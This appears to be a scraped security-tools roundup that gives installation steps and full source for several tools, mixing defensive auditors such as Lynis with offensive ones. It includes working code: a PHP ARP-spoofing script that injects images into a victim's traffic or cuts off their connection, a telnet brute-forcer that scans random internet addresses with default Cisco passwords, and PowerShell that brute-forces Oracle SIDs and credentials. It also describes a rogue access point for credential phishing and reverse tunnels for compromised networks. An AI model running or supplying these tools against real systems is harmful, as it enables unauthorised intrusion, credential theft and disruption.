Recon Using SubBrute and Eyewitness to perform OSINT on a supplied domain.
NOTE: The tools currently takes a target domain from the command line, runs Subbrute then imports that file into EyeWitness. Run setup.sh to create a tools directory and install SubBrute and EyeWitness. If you already have the tools then modify the recon.sh script with the appropriate paths.
Installation:

git clone
cd https://github.com/packetfocus/Recon <your clone folder>
cd <your clone folder>
chmod +x recon.sh
chmod +x setup.sh
./setup.sh

Usage Example:
./recon.sh oracle.com /tmp/output_oracle.txt /tmp/output/oracle

Example Usage

recon.sh Script:

#!/bin/sh

if [ "$1" = "" ]; then
   echo USAGE: "./scan cisco.com /tmp/output.txt /tmp/output/    "
   echo "./scan DOMAIN OUTPUTFILE OUTPUTDIRECTORY"
   exit
fi
touch $2
echo "Starting Recon/OSINT against $1"
echo ""
echo "OPTIONS------"
echo "Output file for SubBrute $2"
echo "Output directory for EyeWitness $3"
echo "Starting Sub-Domain brute force. be PATIENT, this will take some time"
python ~/tools/subbrute/subbrute.py $1 > $2  | tail -f $2
echo "Taking SubDomain list and running it through EyeWitness"
python ~/tools/EyeWitness/EyeWitness.py -f $2 --web --results 250 -d $3 --no-prompt
echo 'DONE! Check $3 report.html for output'

setup.sh Script:

echo "checking to see if /tools directory exists"

if [ ! -d ~/tools ]
then
    mkdir -p ~/tools
else
    echo "TOOLS Directory exists in users home directory"
fi
echo "Checking to see if EyeWitness is installed"

if [ ! -d ~/tools/EyeWitness/ ]
then
    cd ~/tools
    echo "Downloading and Installing EyeWitness"
    git clone https://github.com/ChrisTruncer/EyeWitness.git
    cd ~/tools/EyeWitness/setup
    chmod +x setup.sh
    ./setup.sh
    echo "EyeWitness installed and setup"
else
    echo "EyeWitnedd is installed"
fi

echo "Checking to see if SubBrute is installed"

if [ ! -d ~/tools/subbrute/ ]
then
    cd ~/tools
    echo "Downloading and Installing SubBrute"
    git clone https://github.com/TheRook/subbrute.git
else
    echo "SubBrute is Already Installed"

fi

Source : https://github.com/packetfocus

pwaneddler is A script kiddie for perform MiTM attack and replace image in a host’s browser or for turn off a host’s internet connection
Dependencies:
+ Ettercap (and Etterfilter)
+ Nmap
+ Php

Replace wlan0 with your interface:

$interface = "wlan0";

For use:

chmod +x pwaneddler.php
./pwaneddler.php or php pwaneddler.php

pwaneddler.php Script:

#!/usr/bin/php
<?php
$interface = "wlan0";
define("BANNER","
 ____                               _     _ _           
|  _ \__      ____ _ _ __   ___  __| | __| | | ___ _ __ 
| |_) \ \ /\ / / _` | '_ \ / _ \/ _` |/ _` | |/ _ \ '__|
|  __/ \ V  V / (_| | | | |  __/ (_| | (_| | |  __/ |   
|_|     \_/\_/ \__,_|_| |_|\___|\__,_|\__,_|_|\___|_|   by 0R10n
");
function backMenu()
{
   echo "\n0) Back to menu\n1) Exit\n> ";
   if (cin() == '0') menu();
   else die("Grazie per aver utilizzato PWANEDDLER\n");
}
function colorize($text, $status)
{
   $out = "";
   switch ($status)
   {
   case "SUCCESS":
      $out = "[42m";
      break;
   case "FAILURE":
      $out = "[41m";
      break;
   case "WARNING":
      $out = "[43m";
      break;
   case "NOTE":
      $out = "[44m";
      break;
   default:
      throw new Exception("Invalid status: " . $status);
   }
   return chr(27) . "$out" . "$text" . chr(27) . "[0m";
}
function performReplace($ip, $image)
{
   global $interface;
   $script = '
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"' . $image . '\" ");
   replace("IMG SRC=", "img src=\"' . $image . '\" ");
   msg("Filtro lanciato.\n");
}
';
   file_put_contents('.pwaneddler.eft', $script);
   $result = exec('etterfilter .pwaneddler.eft -o .pwaneddler.ef | grep "Script encoded into 16 instructions."');
   if (trim($result) != '-> Script encoded into 16 instructions.') error("Etterfilter not working");
   system('sudo ettercap -T -q -i ' . $interface . ' -F .pwaneddler.ef -M ARP /' . $ip . '/// ');
}
function listHost()
{
   cls();
   echo BANNER . "\n";
   system("nmap -sP 192.168.1.1/24  | grep 'Nmap scan report for ' | awk -F 'for ' '{print $2}'");
   backMenu();
}
function performOffline($ip)
{
   global $interface;
   $script = "
if (ip.src == '$ip' || ip.dst == '$ip') {
   kill();
   drop();
   " . 'msg("Filtro lanciato.");' . "
}
";
   file_put_contents('.pwaneddler.eft', $script);
   $result = exec('etterfilter .pwaneddler.eft -o .pwaneddler.ef | grep "Script encoded"');
   if (trim($result) != '-> Script encoded into 8 instructions.') error("Etterfilter not working");
   system('sudo ettercap -T -q -i ' . $interface . ' -F .pwaneddler.ef -M ARP /' . $ip . '/// ');
}
function error($str)
{
   cls();
   echo BANNER . "\n" . colorize('[ERROR]' . $str . "\n", "FAILURE");
   die();
}
function imageReplacer()
{
   cls();
   echo BANNER . "
Insert IP: ";
   $ip = cin();
   $valid = filter_var($ip, FILTER_VALIDATE_IP);
   if ($valid)
   {
      cls();
      echo BANNER . "
Insert IP: $ip
Insert Image Link: ";
      $image = cin();
      if (!empty(trim(file_get_contents($image)))) performReplace($ip, $image);
      else error('No valid Image URL!');
   }
   else error('No valid IP address!');
}
function turnOffline()
{
   cls();
   echo BANNER . "
Insert IP: ";
   $ip = cin();
   $valid = filter_var($ip, FILTER_VALIDATE_IP);
   if ($valid) performOffline($ip);
   else error('No valid IP address!');
}
function cin()
{
   return trim(fgets(fopen("php://stdin", "r")));
}
function cls()
{
   system('clear');
}
function menu()
{
   cls();
   echo BANNER . "
1) Image Replacer
2) Turn Offline
3) Host list
0) Exit
";
   $cmd = cin();
   switch ($cmd)
   {
   case '1':
      imageReplacer();
      break;
   case '2':
      turnOffline();
      break;
   case '3':
      listHost();
      break;
   default:
      die("\n");
      break;
   }
}
menu();
?>

Source : https://github.com/AlexWillyOrion

CHANGELOG V-0.6.8:
+ fixed network card as wifi hotspot,some improvements
— remove aircrack-ng dependency
— added plus conf hostapd
— fixed deauth Attack (o exercito BR deu like kkkk)
+ fixed run modules (ARPposion,DNSspoof) on AP started
+ added new plugins dns2proxy
+ added xml session plugins activated
+ removed rule iptables dns gateway local
+ added view->Monitor dns2proxy
+ removed (add redirect rules) button

3vilTwinAttacker v0.6.8

3vilTwinAttacker is security tool that provide the Rogue access point to Man-In-The-Middle and network attacks. purporting to provide wireless Internet services, but snooping on the traffic. can be used to capture of credentials of unsuspecting users by either snooping the communication by phishing.
Features:
+ Rouge Wi-Fi Access Point
+ Deauth Clients AP
+ Probe Request Monitor
+ DHCP Starvation Attack
+ Crendentials Monitor
+ Windows Update Attack
+ Templates phishing
+ Partial bypass HSTS
+ Dump credentials phishing
+ Support airodump scan
+ Support mkd3 deauth
+ beef hook support
+ Report Logs html
+ Mac Changer
+ ARP Posion
+ DNS Spoof
+ Plugins
— net-creds
— sslstrip
— dns2proxy
+ Tools
— ettercap
— driftnet

Dependencies:
+ python-qt4
+ python-scapy
+ python-nmap (optional)
+ python-BeautifulSoup
+ hostapd
+ isc-dhcp-server

INSTALLATION from Source:

wget
tar xf *.tar.gz
cd 3vilTwinAttacker
sudo chmod +x installer.sh
sudo ./installer.sh --install

Download : v0.6.8.zip  | v0.6.8.tar.gz
Source : https://github.com/P0cL4bs
Our Post Before: http://seclist.us/3viltwinattacker-v0-6-7-released-framework-for-rogue-wi-fi-access-point-attack.html

This tool is a part of biger framework. its designed to search_find_brute-force telnet servers. workiing with multithreads (default 5 threads). can be used as testing purpose on your company routers Please use this tool with security in mind don’t be like Script Kidies.

Telnet BruteForce

Lists Script:
alive_host_finder.py: this script is able to find the hosts that are on any network.

Host Finder Example

telnetbruteforce.py: main file.

alive_host_finder.py Script :

import socket
socket.setdefaulttimeout(0.3)
def isON(hostIP):
    try:
        sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sock.connect((hostIP,80))
        return True
    except:
        return False
for a in range(0,255):
    ip = "5.28.191." + str(a)
    if(isON(ip)):
        print "Host:",ip , socket.getfqdn(ip)
print "Done"

telnetbruteforce.py Script :

import threading
import telnetlib
import sys
import socket
import random
import thread
import time

print  "|","-"*61, "|"
print "|\tAll of cisco routers , switches with default\t\t|\n|\tusername and passwords are will have a bad day today\t|"
print "|","-"*61, "|"
def bruteForce(ip):
        dict={"Administrator":"admin","|Administrator":"changeme","cisco":"cisco","admin":"admin","|admin":"diamond","||admin":"cisco","root":"Cisco","|root":"password","||root":"blender","|||root":"attack","bbsd-client":"changeme2","cmaker":"cmaker","cusadmin":"password","hsa":"hsadb","netrangr":"attack","wlse":"wlsedb","wlseuser":"wlseuser"}
        for key,value in dict.iteritems():
                key = key.replace("|" , "")
                try:
                        #print " Trying User:",key,"  Password:",value ,"     on " , ip
                        tn = telnetlib.Telnet(ip,23,2)
                        tn.read_until((":" or ">" or "$" or "@"))
                        tn.write(key + "\n")
                        tn.read_until((":" or ">" or "$" or "@"))
                        tn.write(value + "\n")
                        tn.write("dir\n")
                        tn.write("exit\n")
                        tn.read_all()#we can print this to get the banner
                        print "\t\nLogin successful:", key , " -> " , value
                        tn.close()
                        sys.exit(1)
                except Exception ,e:
                        #print ip , " --> " , e
                        pass
                finally:
                        try:
                                tn.close()
                        except Exception , e:
                                pass

        #randy()

def randy():
        a=random.randint(1,254)
        b=random.randint(1,254)
        c=random.randint(1,254)
        d=random.randint(1,4)
        ip=str(a) + "." +str(b) + "." +str(c) + "." +str(d)
        try:
            telnetlib.Telnet(ip , 23 , 2)
            print "Telneting on host : " , ip
            bruteForce(ip)
        except Exception ,e:
            #print ip," => does not have telnet enabled" , e
            randy()
                
for threads in range(0,20):
        thread.start_new_thread(randy,())
        time.sleep(0.5)




"""
if len(sys.argv) !=4:
	print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
	sys.exit(1)
#----------------------------------------------------------------
try:
        userlist = open(sys.argv[2], "r").readlines()
        #userlist.close()
        for user in userlist:
                user = user.strip("\n")
                users.append(user)
except(IOError): 
  	print "Error: Check your userlist path\n"
  	sys.exit(1)
#------------------------------------------------------------------
try:
  	wordlist = open(sys.argv[3], "r").readlines()
  	#wordlist.close()
except(IOError):
  	print "Error: Check your wordlist path\n"
  	sys.exit(1)
for word in wordlist:
        words.append(word)
#lock = threading.Lock()
#lock.acquire()
#lock.release()
for key , value in dict.iteritems():
        print key.replace("|","")+"="+value
"""

Source : https://github.com/snipperrifle

Latest Change 5/12/2015: Invoke-CredentialsGuess & Invoke-ThreadedFunction.Ora-Pwn is An Oracle attack tool written in PowerShell and using the .NET OracleClient. Can be used to bruteforce SIDs, Username/Passwords, and to execute queries.

Ora-Pwn -Using Invoke QueryExec

Attempts to connect to an Oracle TNSListener using a provided SID and reports whether or not the SID is valid. Accepts a single host and SID, or a list of SIDS/Hosts in a textfile seperated by a newline character.
Ora-Pwn.ps1 Script:

Ora-Pwn is An Oracle attack tool written in PowerShell and using the .NET OracleClient. Can be used to bruteforce SIDs, Username/Passwords, and to execute queries.

Ora-Pwn -Using Invoke QueryExec
    Ora-Pwn -Using Invoke QueryExec

Attempts to connect to an Oracle TNSListener using a provided SID and reports whether or not the SID is valid. Accepts a single host and SID, or a list of SIDS/Hosts in a textfile seperated by a newline character.
Ora-Pwn.ps1 Script:

<#
.SYNOPSIS
Author: Andrew Bonstrom (@ch33kyf3ll0w)
.DESCRIPTION
An Oracle attack tool written in PowerShell and using the .NET OracleClient. Can be used to bruteforce SIDs, Username/Passwords, and to execute queries.
#>

function Invoke-SIDGuess {
<#
.DESCRIPTION
Attempts to connect to an Oracle TNSListener using a provided SID and reports whether or not the SID is valid. Accepts a single host and SID, or a list of SIDS/Hosts in a textfile seperated by a newline character.
.PARAMETER HostName
The host you wish to target.
.PARAMETER HostList
Path to .txt file containing hosts seperated by a newline character.
.PARAMETER HostPort
The Port of the targeted TNSListener.
.PARAMETER SID
The SID of the targeted TNSListener.
.PARAMETER SIDList
Path to .txt file containing SIDs seperated by a newline character.
.EXAMPLE
PS C:\> Invoke-SIDGuess -HostName 192.168.1.34 -HostPort 1521 -SID EPROD
.EXAMPLE
PS C:\> Invoke-SIDGuess  -HostList oracle_hosts.txt -Port 1521 -SIDList sidwordlist.txt
.LINK
https://msdn.microsoft.com/en-us/library/system.data.oracleclient(v=vs.110).aspx
https://technet.microsoft.com/en-us/library/hh849914.aspx
#>

        #Assigning Args
        [CmdletBinding()]
        Param(
        [Parameter(Mandatory = $false)]
        [string]$HostName,
	[Parameter(Mandatory = $false)]
        [string]$HostList,
        [Parameter(Mandatory = $True)]
        [string]$HostPort,   
        [Parameter(Mandatory = $false)]
        [string]$SID,
        [Parameter(Mandatory = $false)]
        [string]$SIDList
)

		#Initialize Arrays
		$sidWordList = @()
		$HostTargetList = @()
		
        #Loads .NET OracleClient Assembly
		Add-Type -AssemblyName System.Data.OracleClient

		#Assign SIDs to be targeted to an array
		if ($SIDList -like "*.txt*"){
			foreach($sid in Get-Content -Path $SIDList){
				$sidWordList += $sid
			}
		}
		else{
			$sidWordList += $SID
		}
		
		#Assign hosts to target to an array
		if ($HostList -like "*.txt*"){
			foreach($ip in Get-Content -Path $HostList){
				$HostTargetList += $ip
			}
		}
		else{
			$HostTargetList += $HostName
		}
		
		Write-Host "`nINFO: Now attempting to connect to the remote TNSListener......`n"
		
		foreach ($h in $HostTargetList){
			foreach ($s in $sidWordList){

				#Creates connection string to use for targeted TNSListener
				$connectionString = "Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(Host=$h)(Port=$HostPort)))(CONNECT_DATA=(SID=$s)));"
				#Creates new object with oracle client .net class using created connection string
				$conn = New-Object -TypeName System.Data.OracleClient.OracleConnection($connectionString)
			
				try
				{
					#Attempts connection
					$conn.Open()
        
				}
				catch
				{
					#Assigns exception message to var
					$ErrorMessage = $_.Exception.Message
					#01017 is the ORA exception that implies failed username/password. Cannot get to this phase without valid SID, therefore the existence of 01017 implies correct SID
					if ($ErrorMessage -match "01017"){
						Write-Host -Object "[+] $s for the TNSListener at $h is valid!`n" -ForegroundColor 'green'
					}
					else{
						Write-Host  -Object "[-] $s is invalid for the TNSListener at $h.`n" -ForegroundColor 'red'
					}

				}
			#Close connection
			$conn.Close()
			}
		}
	}

function Invoke-CredentialGuess {
<#
.DESCRIPTION
Attempts to authenticate to an Oracle Database using provided credentials with a valid SID. Accepts either single Username/Password entries or a list of Usernames/Passwords in a textfile seperated by a newline character.
.PARAMETER HostName
The Host you wish to target.
.PARAMETER HostPort
The Port of the targeted TNSListener.
.PARAMETER SID
The SID of the targeted TNSListener.
.PARAMETER Username
The Username for an existing user.
.PARAMETER UsernameList
Path to .txt file containing usernames seperated by a newline character.
.PARAMETER Password
The password for an existing user.
.PARAMETER PasswordList
Path to .txt file containing passwords seperated by a newline character.
.EXAMPLE
PS C:\> Invoke-CredentialGuess -HostName 192.168.1.34 -HostPort 1521 -SID EPROD -Username bobby -Password joe
.EXAMPLE
PS C:\> Invoke-CredentialGuess -HostName 192.168.1.34 -Port 1521 -SID EPROD -UsernameList users.txt -PasswordList passwords.txt
.LINK
https://msdn.microsoft.com/en-us/library/system.data.oracleclient(v=vs.110).aspx
https://technet.microsoft.com/en-us/library/hh849914.aspx
#>

        #Assigning Args
        [CmdletBinding()]
        Param(
        [Parameter(Mandatory = $True)]
        [string]$HostName,
        [Parameter(Mandatory = $True)]
        [string]$HostPort,   
        [Parameter(Mandatory = $True)]
        [string]$SID,
        [Parameter(Mandatory = $false)]
        [string]$Username,
	[Parameter(Mandatory = $false)]
        [string]$UsernameList,
	[Parameter(Mandatory = $false)]
        [string]$Password,
        [Parameter(Mandatory = $false)]
        [string]$PasswordList
)
        #Loads .NET OracleClient Assembly
		Add-Type -AssemblyName System.Data.OracleClient
		
		#Initialize Arrays
		$UsernameWordList = @()
		$PasswordWordList = @()
		
		#Assign credentials to be used into arrays
		if ($UsernameList -like "*.txt*"){
			foreach($user in Get-Content -Path $UsernameList){
				$UsernameWordList += $user
			}
		}
		else{
			$UsernameWordList += $Username
		}
		
		#Assign hosts to target to an array
		if ($PasswordList -like "*.txt*"){
			foreach($pass in Get-Content -Path $PasswordList){
				$PasswordWordList += $pass
			}
		}
		else{
			$PasswordWordList += $Password
		}
		
		Write-Host "`nINFO: Now beginning credential guessing attempts......`n"
		
		foreach ($u in $UsernameWordList){
			foreach ($p in $PasswordWordList){
				#Creates connection string to use for targeted TNSListener
				$connectionString = "Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(Host=$HostName)(Port=$HostPort)))(CONNECT_DATA=(SID=$SID)));User id=$u;Password=$p"
				#Creates new object with oracle client .net class using created connection string
				$conn = New-Object -TypeName System.Data.OracleClient.OracleConnection($connectionString)

				try
				{
					$conn.Open()
					Write-Host  -Object "[+] The provided Username $u and Password $p were correct for $HostName!" -ForegroundColor 'green'
				}
				catch
				{
					#Assigns exception message to var
					$ErrorMessage = $_.Exception.Message
					#01017 is the ORA exception that implies failed username/password. 
					if ($ErrorMessage -match "01017"){
						Write-Host  -Object "`n[-] The provided Username $u and Password $p were incorrect for $HostName!`n" -ForegroundColor 'red'
					}
					else{
						Write-Host  -Object "`n[*] Connection Failed. Error: $ErrorMessage" -ForegroundColor 'red'
					}			
				}
			$conn.Close()
			}
		}

	}

function Invoke-QueryExec {

<#
.DESCRIPTION
Oracle PowerShell client that can be used to interface with a TNS Listener and the back end database to run queries.
.PARAMETER HostName
Host of the remote TNS Listener.
.PARAMETER HostPort
Port of the remote TNS Listener.
.PARAMETER SID
SID of the remote TNS Listener.
.PARAMETER Username
Username to authenticate against the remote Oracle DB.
.PARAMETER Password
Password to authenticate agains the remote Oracle DB.
.PARAMETER QueryString
Query to execute on the remote Oracle DB.
.EXAMPLE
PS C:\> Invoke-QueryExec  -Hostname 192.168.1.34 -HostPort 1521 -SID EPROD -Username SCOTT -Password TIGER -QueryString "SELECT * FROM TABLE"
.LINK
https://msdn.microsoft.com/en-us/library/system.data.oracleclient(v=vs.110).aspx
https://technet.microsoft.com/en-us/library/hh849914.aspx
#>

	#Assigning Args
	[CmdletBinding()]
    		param(
        [Parameter(Mandatory = $True)]
        [string]$HostName,
        [Parameter(Mandatory = $True)]
        [string]$HostPort,
        [Parameter(Mandatory = $True)]
        [string]$SID,
        [Parameter(Mandatory = $True)]
        [string]$Username,
        [Parameter(Mandatory = $True)]
        [string]$Password,
        [Parameter(Mandatory = $false)]
        [string]$QueryString = "SELECT username FROM dba_users order by username"
    	)
		
	#Loads .NET OracleClient Assembly
	Add-Type -AssemblyName System.Data.OracleClient

	#Create connection string
	$connectionString = "Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(Host=$HostName)(Port=$HostPort)))(CONNECT_DATA=(SID=$SID)));User id=$Username;Password=$Password"
	#Initiate connection to DB
	$conn = new-object System.Data.OracleClient.OracleConnection($connectionString)
	$command = new-Object System.Data.OracleClient.OracleCommand($QueryString, $conn)
	

	Write-Host "`nINFO: Now attempting to execute provided query......`n"
	Write-Host "Provided Query: $QueryString`n"
	Write-Host "Query Output:`n"
	
	try {
		#Open connection to DB
		$conn.Open()
		$reader = $command.ExecuteReader()
		while ($reader.Read()){
			Write-Host $reader.GetValue(0)
		}
		
	}
	catch {
		#Assigns exception message to var
		$ErrorMessage = $_.Exception.Message
		Write-Host  -Object "`n[*] Query execution Failed. Error: $ErrorMessage" -ForegroundColor 'red'						
	}
$conn.Close()
}

Source: https://github.com/ch33kyf3ll0w | Our Post Before

Changelog in v0.6 Modules Added:
(x) GoogleDocSearch.py

SimplyEmail-v-0-6

SimplyEmail
What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.

SimpleEmail is a email recon tool that is fast and easy framework to build on

Scrape EVERYTHING – Simply
A few small benfits:
+ Easy for you to write modules (All you need is 3 required Class options and your up and running)
+ Multiprocessing Queue for modules and Result Queue for easy handling of Email data
+ Simple intergration of theHarvester Modules and new ones to come
+ Also the ability to change major settings fast without diving into the code

Latest Change :
– Common : Task Queue Updates
– Module : Task Queue Updates
– Helper : Task Queue Updates

Download : 0.6.zip  | 0.6.tar.gz  | Our Post Before
Source : https://github.com/killswitch-GUI

Roadmap and Changelog v-0.72:
+ Fix broken blind and time and some issues : fix #83, fix #82, fix #67, fix #60, fix #46

jSQL Injection Version-0.72

Changelog v-071:
+ Coder/Bruter for Adler32 Crc16 Crc32 Crc64
+ Format Github reporter
+ Fix header connection test

jSQL Injection is a lightweight application used to find database information from a distant server.
jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

jSQL Injection is a lightweight application used to find database information from a distant server.

Kali Linux logo jSQL is part of Kali Linux, the official new BackTrack penetration distribution.
jSQL is also included in Black Hat Sec, ArchAssault Project and BlackArch Linux.

Disclaimer :
Attacking web-server is illegal without prior mutual consent. The end user is responsible and obeys all applicable laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Download : jsql-injection-alpha.v0.72.jar(2.39 MB)
Source : https://github.com/ron190
Our Post Before : http://seclist.us/jsql-injection-v-0-7-released-a-java-tool-for-automatic-database-injection.html

Firecat is a penetration testing tool that allows you to punch reverse TCP tunnels out of a compromised network. After a tunnel is established, you can connect from an external host to any port on any system inside the compromised network, even if the network is behind a NAT gateway and/or strict firewall. This can be useful for a number of purposes, including gaining Remote Desktop access to the internal network NAT’d IP address (e.g. 192.168.1.10) of a compromised web server.

Firecat is a penetration testing tool that allows you to punch reverse TCP tunnels out of a compromised network.

How does it work?
Flashback a decade or so and you will recall that it was common to find hosts that were not firewalled properly (or at all) from the Internet. You could compromise a host, bind shellcode to a port, and use netcat or some other tool to take interactive command-line control of the target.

These days things are different. It is often the case that TCP/IP packets destined for a host are strictly filtered by ingress firewall rules. Often matters are further complicated by the fact that the target host is located behind a NAT gateway:
Tight firewall rules reduce the attack surface of the target environment, but attacks such as SQL injection still make it possible to execute arbitrary code on even the most strictly firewalled servers. However, unless the consultant can also take control of the firewall and alter the ruleset, it is impossible to connect directly to internal network services other than those allowed by the firewall.

That’s where Firecat comes in to play. Assuming you can execute commands on a host in a DMZ and further assuming that the host can initiate outbound TCP/IP connections to the consultant’s computer, Firecat makes it possible for the consultant to connect to any port on the target host, and often any port on any host inside the DMZ. It does this by creating a reverse TCP tunnel through the firewall and using the tunnel to broker arbitrary TCP connections between the consultant and hosts in the target environment. In addition to creating arbitrary TCP/IP tunnels into DMZ networks, it can also be used to pop connect-back shells from compromised DMZ hosts such as web or SQL servers.

It works because the target system is the one that initiates the TCP connection back to the consultant, not the other way around. Firecat runs in “target” mode on the target, and “consultant” mode on the consultant’s system, effectively creating a tunnel between the two endpoints. Once the tunnel is established, the consultant connects to their local Firecat daemon which instructs the remote Firecat daemon to initiate a connection to the desired host/port behind the firewall. The two Firecat daemons then tunnel the data between the consultant and the target to create a seamless, transparent bridge between the two systems; thus completely bypassing the firewall rules. Firecat even works on hosts behind NAT firewalls.

Broken down into logical steps, and using the IP addresses in the diagrams, the process works as follows:
1. Firecat (consultant) listens on 202.1.1.1:4444
2. Firecat (target) connects to 202.1.1.1:4444
3. A tunnel is established between the two hosts
4. Firecat (consultant) listens on 202.1.1.1:3389
5. Consultant connects a remote desktop client to 202.1.1.1:3389
6. Firecat (consultant) tells Firecat (target) that a new session has been started
7. Firecat (target) connects to 192.168.0.1:3389
8. Firecat (target) tells Firecat (consultant) that it’s now connected locally
9. Both Firecat instances begin to tunnel data between the consultant’s remote desktop client and the target’s remote desktop server, making it appear to the remote desktop client that it is directly connected to the target.

Install:
Firecat is written in C and has been tested on Linux, Solaris, iOS, Mac OS X, and Windows XP/Vista/2k/2k3/2k8.

git clone https://github.com/BishopFox/firecat
cd firecat
To compile on Windows using MinGW:
    gcc –o firecat.exe firecat.c –lwsock32
To compile on Unix:
    gcc –o firecat firecat.c

Download Binary Latest Version:
Firecat v1.6 – Win Binaries.zip  (Firecat utility binaries for Windows 32bit / 64bit.)
Firecat v1.6 – Unix Binaries.zip  (Firecat utilities binaries for Linux (x86/x64), Debian Linux ARMv5, and iOS ARM binary (for jailbroken iPad / iPhone).)
Source : https://github.com/BishopFox

Has been tested on WIndows Xp/Vista/7/8.1/10, Kali 2.0, Ubuntu 14.04

The purpose of this tool is to be a Swiss army knife for anyone who works with HTTP, so far it she is basic, bringing only some of the few features that want her to have, but we can already see in this tool:
– Email Crawler in sites
– Crawler forms on the page
– Crawler links on web pages
– Sending POST and GET
– Support for USER-AGENT
– Support for THREADS
– Support for COOKIES

Latest Change 7/12/2015:
Models : regex Update Linkedin

System Requirements:
+ Windows XP/Vista/7/8.1/10, Ubuntu 14.01, Kali 2.0
+ python 2.7.x
Installation :

git clone http://github.com/danilovazb/sawef
cd sawef
pip install -r requirements.txt
python sawef.py

Example-Usage-Sawef

Source :http://github.com/danilovazb

= Changelog Lynis 2.1.5 =
This is an major release, which includes both new features and enhancements to existing tests.

* Automation tools
——————
CFEngine detection has been further extended. Additional logging and reporting of automation tools.

* Authentication
—————-
Depending on the operating system, Lynis now tries to determine if failed logins are properly logged. This includes checking for /etc/login.defs [AUTH-9408]. Merged password check on Solaris into AUTH-9228.
PAM settings are now analyzed, including:
– Two-factor authentication methods
– Minimum password length, password strength and protection status against brute force cracking
report option: auth_failed_logins_logged

* Compliance
————
Added new compliance_standards option to default.prf, to define if compliance testing should be performed, and for which standards.
Right now these (partial) standards are included:
– HIPAA
– ISO27001/ISO27002
– PCI-DSS

* DNS and Name services
———————–
Support added for Unbound DNS caching tool [NAME-4034]
Configuration check for Unbound [NAME-4036]
Record if a name caching utility is being used like nscd or Unbound. Also logging to report as field name_cache_used

* Firewalls
———–
IPFW firewall on FreeBSD test improved.
Don’t show pflogd status on screen when pf is not available

* Malware
———
ESET and LMD (Linux Malware Detect) is now recognized as a malware scanner. Discovered malware scanners are now also logged to the report.

* Mount points
————–
FILE-6374 is expanded to test for multiple common mount points and define best practice mount flags.

* Operating systems
——————-
Improved support for Debian 8 systems.
Boot loader exception is not longer displayed when only a subset of tests is performed.
FreeBSD systems can now use service command to gather information about enabled services.

* UEFI and Secure Boot
———————-
Initial support to test UEFI settings, including Secure Boot option Options boot_uefi_booted and boot_uefi_booted_secure added to report file

* Virtual machines and Containers
———————————
Detection of virtual machines has been extended in several ways. Now VMware tools (vmtoolsd) are detected and machine state is improved with tools like Puppet Facter, dmidecode, and lscpu. Properly detect Docker on CoreOS systems, where it before gave error as it found directory /usr/libexec/docker.
Check file permissions for Docker files, like socket file [CONT-8108]

* Individual tests
——————
[AUTH-9204] Exclude NIS entries to avoid false positives
[AUTH-9230] Removed test as it was merged into AUTH-9228
[AUTH-9328] Show correct message when no umask is found in /etc/profile. It also includes improved logging, and support for /etc/login.conf on systems like FreeBSD.
[BOOT-5180] Only gets executed if runlevel 2 is found
[CONT-8108] New test to test for Docker file permissions
[FILE-6410] Added /var/lib/locatedb as search path
[HOME-9310] Use POSIX compatible flags to avoid errors on BusyBox
[MALW-3278] New test to detect LMD (Linux Malware Detect)
[SHLL-6230] Test for umask values in shell configuration files (e.g. rc files)
[TIME-3104] Show only suggestion on FreeBSD systems if ntpdate is configured, yet ntpd isn’t running

* Functions
———–
[DigitsOnly] New function to extract only numbers from a text string
[DisplayManual] New function to show text on screen without any markup
[ExitCustom] New function to allow program to exit with a different exit code, depending on outcome
[ReportSuggestion] Allows two additional parameters to store details (text and external reference to a solution)
[ReportWarning] Like ReportSuggestion() has additional parameters
[ShowComplianceFinding] Display compliance findings

* General improvements
———————-
– When using pentest mode, it will continue without any delays (=quick mode)
– Data uploads: provide help when self-signed certificates are used
– Improved output for tests which before showed results as a warning, while actually are just suggestions
– Lynis now uses different exit codes, depending on errors or finding warnings. This helps with automation and any custom scripting you want to apply
– Tool tips are displayed, to make Lynis even easier to use
– PID file has additional checks, including cleanups

* Plugins
———
[PLGN-2804] Limit report output of EXT file systems to 1 item per line
Lynis is a security auditing for Unix derivatives like Linux, BSD, and Solaris. It performs an in-depth security scan on the system to detect software and security issues. Besides information related to security, it will also scan for general system information, vulnerable software packages, and possible configuration issues.
We believe software should be simple, updated on a regular basis and open. You should be able to trust, understand, and even alter the software. Many agree with us, as the software is being used by thousands every day to protect their systems.

Main goals:
+ Security auditing (automated)
+ Compliance testing (e.g. PCI-DSS, HIPAA)
+ Vulnerability testing

The software aims to also assist with:
+ Configuration management
+ Software patch management
+ System hardening
+ Penetration testing
+ Malware scanning
+ Intrusion detection
Installation:

git clone https://github.com/CISOfy/lynis
cd lynis
./lynis audit system
-----------------------------------------
update
cd <your lynis folder>
git pull

Or

Download old Binary v2.1.1: 2.1.1.zip  | 2.1.1.tar.gz
Our post Before : http://seclist.us/updates-lynis-v-2-1-0-is-a-system-and-security-auditing-tool-for-unixlinux.html
Source: https://cisofy.com/lynis/

A collection of security related Bash shell scripts. No fancy programming framework required, all that is needed is a Bash shell.
analyze-hosts.sh
A simple wrapper script around several open source security tools to simplify scanning of hosts for network vulnerabilities. The script lets you analyze one or several hosts for common misconfiguration vulnerabilities and weaknesses. The main objectives for the script is to make it as easy as possible to perform generic security tests, without any heavy prerequisites, make the output as informative as possible, and use open source tools….

analyze-host

+ cipherscan
+ curl
+ nmap
+ openssl
+ whatweb

changelog v8/12/2015: Added check on open secure redirect (–redirect)

File Lists:
+ analyze_hosts.sh: analyze_hosts version 0.93
+ test_ssl_handshake.sh

Example Usage:
./analyze_hosts.sh –sslcert www.facebook.com

Example Usage

./analyze_hosts.sh –ssl –sslports 443 -v www.facebook.com
./test_ssl_handshake.sh

test-ssl-handshake helper

Installation:

